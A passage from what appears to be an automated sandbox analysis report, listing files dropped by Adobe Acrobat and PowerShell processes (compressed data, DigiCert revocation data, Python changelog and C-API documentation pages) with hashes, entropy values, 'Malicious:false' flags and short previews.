                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1419751
                                                                                                    Entropy (8bit):7.976496077007677
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:/xA7owWLaGZDwYIGNPJodpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:JVwWLaGZDwZGk3mlind9i4ufFXpAXkru
                                                                                                    MD5:18E3D04537AF72FDBEB3760B2D10C80E
                                                                                                    SHA1:B313CD0B25E41E5CF0DFB83B33AB3E3C7678D5CC
                                                                                                    SHA-256:BBEF113A2057EE7EAC911DC960D36D4A62C262DAE5B1379257908228243BD6F4
                                                                                                    SHA-512:2A5B9B0A5DC98151AD2346055DF2F7BFDE62F6069A4A6A9AB3377B644D61AE31609B9FC73BEE4A0E929F84BF30DA4C1CDE628915AC37C7542FD170D12DE41298
                                                                                                    Malicious:false
                                                                                                    Preview:...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E|.P..$ni.{.....T.^~<m-..J....RQk..*..f.....q.......V.rC.M.b.DiL\.....wq.*...$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..D*T...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W*..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.......*..R.....j.WD).M..9.Fw...W.-a..z.l\..u*.^....*L..^.`.T...l.^.B.DMc.d....i...o.|M.uF|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,*.e....5...X.}6.P....y\.s|..Si..BB..y...~.....D^g...*7'T-.5*.!K.$\...2.
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                    File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                                                                    Category:dropped
                                                                                                    Size (bytes):758601
                                                                                                    Entropy (8bit):7.98639316555857
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                                                                    MD5:3A49135134665364308390AC398006F1
                                                                                                    SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                                                                    SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                                                                    SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                                                                    Malicious:false
                                                                                                    Preview:...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!|G.1...... .3.`./....`~......G.............|..pS.e.C....:o.u_..oi.:..|....joi...eM.m.K...2%...Z..j...VUh..9.}.....
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):98682
                                                                                                    Entropy (8bit):6.445287254681573
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:0tlkIi4M2MXZcFVZNt0zfIagnbSLDII+D61S8:03kf4MlpyZN+gbE8pD61L
                                                                                                    MD5:7113425405A05E110DC458BBF93F608A
                                                                                                    SHA1:88123C4AD0C5E5AFB0A3D4E9A43EAFDF7C4EBAAF
                                                                                                    SHA-256:7E5C3C23B9F730818CDC71D7A2EA01FE57F03C03118D477ADB18FA6A8DBDBC46
                                                                                                    SHA-512:6AFE246B0B5CD5DE74F60A19E31822F83CCA274A61545546BDA90DDE97C84C163CB1D4277D0F4E0F70F1E4DE4B76D1DEB22992E44030E28EB9E56A7EA2AB5E8D
                                                                                                    Malicious:false
                                                                                                    Preview:0...u0...\...0...*.H........0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1..240807121815Z..240814121815Z0..~.0!.......0.E....[0...210531000001Z0!...7g...(..^`.x.l...210531000001Z0!...\./M.8..>.f.....210531000001Z0!...*B.Sh...f...s.0..210531000001Z0!..../n...h..7....>..210601000001Z0!....0..>5..aN.u{D..210601000001Z0!...-...qpWa.!n.....210601000001Z0!..."f...\..N.....X..210601000001Z0!...in.H...[u...]....210602000001Z0!......`......._.]...210602000001Z0!...{..e..i......=..210602000001Z0!......S....fNj'.wy..210602000001Z0!......C.lm..B.*.....210602000001Z0!... .}...|.,dk...+..210603000001Z0!...U.K....o.".Rj..210603000001Z0!.....A...K.ZpK..'h..210603000001Z0!.....&}{ ......l..210603000001Z0!...:.m...I.p.;..v..210604000001Z0!...1"uw3..Gou.qg.q..210607000001Z0!...1.o}...c/...-R}..210608000001Z0!................210608000001Z0!...[.N.d............210609000001Z0!......x..i........210610000001Z0!...(... (..#.^.f...210
                                                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):737
                                                                                                    Entropy (8bit):7.501268097735403
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:yeRLaWQMnFQlRKfdFfBy6T6FYoX0fH8PkwWWOxPLA3jw/fQMlNdP8LOUa:y2GWnSKfdtw46FYfP1icPLHCfa
                                                                                                    MD5:5274D23C3AB7C3D5A4F3F86D4249A545
                                                                                                    SHA1:8A3778F5083169B281B610F2036E79AEA3020192
                                                                                                    SHA-256:8FEF0EEC745051335467846C2F3059BD450048E744D83EBE6B7FD7179A5E5F97
                                                                                                    SHA-512:FC3E30422A35A78C93EDB2DAD6FAF02058FC37099E9CACD639A079DF70E650FEC635CF7592FFB069F23E90B47B0D7CF3518166848494A35AF1E10B50BB177574
                                                                                                    Malicious:false
                                                                                                    Preview:0...0.....0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G4..240806194648Z..240827194648Z.00.0...U.#..0.......q]dL..g?....O0...U........0...*.H.............vz..@.Nm...6d...t;.Jx?....6...p...#.[.......o.q...;.........?......o...^p0R*.......~....)....i.*n;A.n.z..O~..%=..s..W.4.+........G...*..=....xen$_i"s..\...L..4../<.4...G.....L...c..k@.J.rC.4h.c.ck./.Q-r53..a#.8#......0.n......a.-'..S. .>..xAKo.k.....;.D>....sb '<..-o.KE...X!i.].c.....o~.q........D...`....N... W:{.3......a@....i....#./..eQ...e.......W.s..V:.38..U.H{.>.....#....?{.....bYAk'b0on..Gb..-..).."q2GO<S.C...FsY!D....x..]4.....X....Y...Rj.....I.96$.4ZQ&..$,hC..H.%..hE....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1729230
                                                                                                    Entropy (8bit):5.068829003493946
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24576:7F4Hmo/1VMkuFLvq1o/1lw2xRQACqw/guOogEtYQfB:7F4Go/1VMkuFLvq1w1lwaRNY/IEhB
                                                                                                    MD5:3A2F081757C87FE3F9745F2E857755FA
                                                                                                    SHA1:0D49E71B9E0FFAA4F4DC8DCB45A95BAA664038E7
                                                                                                    SHA-256:A15B65D338884EF6B8B99EA300405A293DFEC362610E79B8D19755112624210E
                                                                                                    SHA-512:21F9968546C590D9F8A87333345F6086725905BA2724E5CA5F8F8E1165C20703906FDA8E1D0BF59517ABE8B166B80F47380E70BB535713A1E7E313B673F21FBD
                                                                                                    Malicious:false
                                                                                                    Preview:+++++++++++..Python News..+++++++++++....What's New in Python 3.12.3 final?..==================================....*Release date: 2024-04-09*....Security..--------....- gh-issue-115398: Allow controlling Expat >=2.6.0 reparse deferral.. (CVE-2023-52425) by adding five new methods:.... * :meth:`xml.etree.ElementTree.XMLParser.flush`.. * :meth:`xml.etree.ElementTree.XMLPullParser.flush`.. * :meth:`xml.parsers.expat.xmlparser.GetReparseDeferralEnabled`.. * :meth:`xml.parsers.expat.xmlparser.SetReparseDeferralEnabled`.. * :meth:`xml.sax.expatreader.ExpatParser.flush`....- gh-issue-115399: Update bundled libexpat to 2.6.0....- gh-issue-115243: Fix possible crashes in :meth:`collections.deque.index`.. when the deque is concurrently modified.....- gh-issue-114572: :meth:`ssl.SSLContext.cert_store_stats` and.. :meth:`ssl.SSLContext.get_ca_certs` now correctly lock access to the.. certificate store, when the :class:`ssl.SSLContext` is shared across.. multiple threads.....Core and Buil
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1254), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23547
                                                                                                    Entropy (8bit):4.905608536545633
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:OEHqklfQ6EnwCTMe8VJueIJebJheIJerYbVJJeIVJ98JeoJselJ98JerYZ0eGtDk:tqy4DrM3JueIJebJheIJerYJJJeCJ986
                                                                                                    MD5:BD845DBEED53B8C79994EB0FA130C66D
                                                                                                    SHA1:F97B5C0B18C05805EA447692BC7A53F8B6C6149A
                                                                                                    SHA-256:894F17F9D88D1D25D968CF1240D950FBE7C92B6E31640D1BA2670DC1A5FBA83D
                                                                                                    SHA-512:B89B4A4D1CA716F73FA2D34024B9AED86606D6FFE1543140C39779F27FA9D991B1A2AF66B51A75E3A72F52A2F55BDB41F897981AF4369BACC8AC744220054E7C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Allocating Objects on the Heap" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/allocation.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta property="og:image:width" content="200" />..<meta property="og:image:height" content="200" />..<meta name="theme-color" content="#3776ab" />.... <title>Allocating Objects on the Heap &#8212; Python 3.12.3 documentation</title><meta name="viewport" content="width=device-width, initial-scale=1.0">.. .. <link rel="st
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (423), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):20544
                                                                                                    Entropy (8bit):4.946657739990355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:CTYHqklcyxn6TMI8qekeFereatemeHK2sxEheu4o//PnYTMe76dqEC:CTsqycKYMZqekeFereatemeHKlxEheBL
                                                                                                    MD5:3795D5DB681C6B3E5025F2C3DF00DD01
                                                                                                    SHA1:0539C578532C3DB3C44CE08EDF57CD386E288AEA
                                                                                                    SHA-256:5C5BB14B151D7EF802500A8AE3BE4285E929A88D096733EE930228BB1DB0803D
                                                                                                    SHA-512:B218C957BDB79D9592297AB3499093448C90A5A07989D9E7B1C8964DAB4C8C30413017F2DB4B176D0108EB509365B8CE1570522DB478048D5164D7697339246F
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="API and ABI Versioning" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/apiabiversion.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="CPython exposes its version number in the following macros. Note that these correspond to the version code is built with, not necessarily the version used at run time. See C API Stability for a dis..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="CPython exposes its version number in the following ma
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1573), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):105280
                                                                                                    Entropy (8bit):4.817954471982983
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:oqyTM0FM76e2DWQBCA52OUngNo2G2jC95JoayaW6d9lSE3OKgUeCJHeCHtk9reCH:q8HoWQBCA52chOtUqq2J9g
                                                                                                    MD5:75E56C71F8C49F3EFB2973D14F1B8D93
                                                                                                    SHA1:AFB958E3408E1D5BB1422F55F40B24C54F28076F
                                                                                                    SHA-256:8A7E2FFC0F44AAFD08D9C7DE0D5D6428FE2F213AE000F0EB5029437975D94510
                                                                                                    SHA-512:F880B23EA38720EB35838C46B3AD63DDB14F73A98E805F40F0D1E8C352B5CBC48820EF40C053407751BDE5A93FFC7B4AC0B3375F72AC931248540F23F19DD49F
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Parsing arguments and building values" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/arg.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions are useful when creating your own extensions functions and methods. Additional information and examples are available in Extending and Embedding the Python Interpreter. The first th..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions are useful when creating your own
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (602), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):19816
                                                                                                    Entropy (8bit):4.899593946513707
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:kHqkl/EqnWTMarDLeEnzZeIVJlRVJnevJVJueRZev1eJVJcevxTpunkTM876dqEC:oqy/h8MmLeEnzZeCJlzJnejJuenedebD
                                                                                                    MD5:18D0469E76ABBA5C1A11ACFFD1A44C5E
                                                                                                    SHA1:818B16213A1A455B01027492E821AD2C04FE1CBF
                                                                                                    SHA-256:A86FC96F7D9D4EBB1843FDBE82CC0768E6690505AC7CA57E1C40FB0D3F459DD8
                                                                                                    SHA-512:AA4FB46254EC452364EFA786318A8B4263C9991122251199321A66644507A14AC1C313B4677D33738DF2AD0956C8F5916AC6EA2B38F721C2AD0AEF2B89E9259C
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Boolean Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bool.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Booleans in Python are implemented as a subclass of integers. There are only two booleans, Py_False and Py_True. As such, the normal creation and deletion functions don.t apply to booleans. The fol..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Booleans in Python are implemented as a subclass of integers. There
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1175), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):92164
                                                                                                    Entropy (8bit):4.893692641705431
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:4qyeMZFU8v3e2HjeGkNJbeJgecve0deICHzeLNeUJne0JkeGpJ+eioHRede0eIe4:h8Jk2XkZpZoTZg
                                                                                                    MD5:BB33C1922D336D9F4E9C8AEE33823E3F
                                                                                                    SHA1:644D2C647EA3DAF536ECF2398D2A9E9430E1D6B3
                                                                                                    SHA-256:BE7E1A8BAD865FEFE598FF580E201FBAB11F58B1311E296D90F8F0DA97D4C52A
                                                                                                    SHA-512:8D51A2368050DB668D6AE61A5E396D605657CA6BE4F7CE955AA3653E374C00C1438C76D1C9FB5700479D5A8D808FF1F9A5B7CD0CBF2CC73AC0C98543D084B62F
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Buffer Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/buffer.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Certain objects available in Python wrap access to an underlying memory array or buffer. Such objects include the built-in bytes and bytearray, and some extension types like array.array. Third-part..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Certain objects available in Python wrap access to an underlying mem
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1010), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):27357
                                                                                                    Entropy (8bit):4.906893227281136
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:yqyQbamMKMe/OYelOceCJlbheCJlGJUeCJlzukJAeiCHXr2xJXeCJXeJWLVeCJbd:yqyaMKMe2YeUceCJlbheCJlGJUeCJlz0
                                                                                                    MD5:4ACAD7ED5DB31641356BB198E7F3580F
                                                                                                    SHA1:192C71D66259F6B83434019AE6E16F15D540DE30
                                                                                                    SHA-256:B6D000BABC350B1217DE8ECED27CBCCB91D120B1BAF4D0E233F97456E723A18F
                                                                                                    SHA-512:2260BB6D0DE1D025F0783CBD98EEC770F8289E489D8619BD33A70EABF933C9FF9F839B49135F390FF697A555531CD81C61F07A0FE802C07B81B56EBD1920E779
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Byte Array Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bytearray.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Type check macros: Direct API functions: Macros: These macros trade safety for speed and they don.t check pointers." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Type check macros: Direct API functions: Macros: These macros trade safety for speed and they don.t check pointers." />..<meta property="og:ima
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1121), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):43397
                                                                                                    Entropy (8bit):4.8909900225739635
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:pqysULMKwePOQe1+6IeCJl/leCJlxJieiCHSvJ8eiCHSr21JgeiCHtkhuKJ0eiCs:pqyZMKweGQec6IeCJl/leCJlxJieiCHO
                                                                                                    MD5:13B9F6F70BFF2588DDE59CE0E362870C
                                                                                                    SHA1:BC5C759D19130D72A1E8A9BB61A604298A5CD7DE
                                                                                                    SHA-256:FB59306ADA4B96802A8C94D003C8767BFAA208D89DDAD00DD7DC18A5637979EC
                                                                                                    SHA-512:0C076FA73110A98FE5E0715E75BCF565C9A3CA8541DDE6DFA3C27C1EC0F6A3C01629AB18D8D6BA06AABCF4E3A8BF4343F5FDCB9045766E2B68EEEBB2B3DDE7AC
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Bytes Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/bytes.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="These functions raise TypeError when expecting a bytes parameter and called with a non-bytes parameter." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="These functions raise TypeError when expecting a bytes parameter and called with a non-bytes parameter." />..<meta property="og:image:width" content="200" />..<meta pro
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2016), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):71486
                                                                                                    Entropy (8bit):4.9168857488632725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:WqyaMYiVlJGMheRG6JyylJ6HHy1sylJaRXrehXPe0s94qeCJ9vJbeCJyeJmeJmkm:2DZjg
                                                                                                    MD5:6C78E3C5F7710C32C1C79C6F85DD88A5
                                                                                                    SHA1:817E1E09A124DD4D89F2A8A5C0DD7769C1FAEE4E
                                                                                                    SHA-256:482D4441A2C0A0FAD02699DB76BAEEB230C742624E973CBEFD109DA44075A484
                                                                                                    SHA-512:8AA9DEEF38C1F8B5E51302996D3A4538D5DB5A489DE7A6D9C1C7583E3E2E23898815B30CF8D827BF8FA6590D7C20875883942AE1E09A65C390770D643C31C651
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Call Protocol" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/call.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="CPython supports two different calling protocols: tp_call and vectorcall. The tp_call Protocol: Instances of classes that set tp_call are callable. The signature of the slot is: A call is made usin..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="CPython supports two different calling protocols: tp_call and vectorcall
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1156), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36464
                                                                                                    Entropy (8bit):4.840757880078915
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:SqyHq4Mpve4WfBe5xQVeCJs9JRerHJeCHJbOABHhIeCJ3eCHJEybiueCJ3EfzHhx:SqyjMpve4WfBe5xQVeCJs9JRerHJeCHh
                                                                                                    MD5:D4737B36C8139F229E8BD3B9678E56F6
                                                                                                    SHA1:06DE3416092A1E197D898DAA8D8B43E4E3F2F121
                                                                                                    SHA-256:91DD68E0DFE23719AACAB9E09510B82B8AD3DB7E4D78E169FF797B73717D6CF4
                                                                                                    SHA-512:05FAEAB61270D65287ECB1675AAD45F119A57597C0B429784B62BAC35CF3F8EA81DF8DA1A19E93EB400E91790EB9680A85F9B9FDFC9642D21277713D3A3F1EB9
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Capsules" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/capsule.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Refer to Providing a C API for an Extension Module for more information on using these objects." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Refer to Providing a C API for an Extension Module for more information on using these objects." />..<meta property="og:image:width" content="200" />..<meta property="og:image:hei
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (864), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21181
                                                                                                    Entropy (8bit):4.870153602982891
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:RHqkl4wsnJTM9VeaDzeQheIVJjGVJqeIVJj2VJ0eIVJCpVJ0eIVJC/5eIVJCEVJh:hqy4d9M9VekzeQheCJjMJqeCJj8J0eCe
                                                                                                    MD5:0C1D0AA7B6BC97311C45670DC76634CA
                                                                                                    SHA1:BCE9B1E95363BFDB8FBD157967B450DC8B59E28E
                                                                                                    SHA-256:170620D563439C6C53135899827A0E904DF8FF96B419AC92EE59A5DA8DAA0A3C
                                                                                                    SHA-512:F220472843C2AB6F881A04804F6854FD9DD1BB49C6EADD37463CB33B0636F0D8D1759760FDF0619CDF7833AC3EF12D78C10C7A050E7F94108DC26AAC63DF8CD1
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Cell Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/cell.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content=".Cell. objects are used to implement variables referenced by multiple scopes. For each such variable, a cell object is created to store the value; the local variables of each stack frame that refer..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content=".Cell. objects are used to implement variables referenced by mult
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (4446), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):55705
                                                                                                    Entropy (8bit):4.843599721590231
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:OqyiM38ezge9MeCJgiOekJgV+ekJgSJWeUoocoBoaoEeJreJqeJkeJpeJGeJYeJ3:zShag
                                                                                                    MD5:710C2BE9619FB179A6E5F08B364931F9
                                                                                                    SHA1:E070E54A56D86A9879EE91DCE1C22C513492BF0C
                                                                                                    SHA-256:FAFCA581AD0AC320BC255CBD4F3F4BC396426D3AA1214FACE26D980DF5D9ADC4
                                                                                                    SHA-512:C1F7441A080514097072548A0025946ED1AD2C5BE0A418624102245744FD28BBAC0BE8B77E81E3656AE7A1A5BE72F4D8A73FACD411C7793F0577498E470AF0C8
                                                                                                    Malicious:false
                                                                                                    Preview:<!DOCTYPE html>....<html lang="en" data-content_root="../">.. <head>.. <meta charset="utf-8" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta name="viewport" content="width=device-width, initial-scale=1" />..<meta property="og:title" content="Code Objects" />..<meta property="og:type" content="website" />..<meta property="og:url" content="https://docs.python.org/3/c-api/code.html" />..<meta property="og:site_name" content="Python documentation" />..<meta property="og:description" content="Code objects are a low-level detail of the CPython implementation. Each one represents a chunk of executable code that hasn.t yet been bound into a function. Extra information: To support low-level..." />..<meta property="og:image" content="https://docs.python.org/3/_static/og-image.png" />..<meta property="og:image:alt" content="Python documentation" />..<meta name="description" content="Code objects are a low-level detail of the CPython implementation. Each
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1274), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):43417
                                                                                                    Entropy (8bit):4.83612680829369
                                                                                                    Encrypted:false
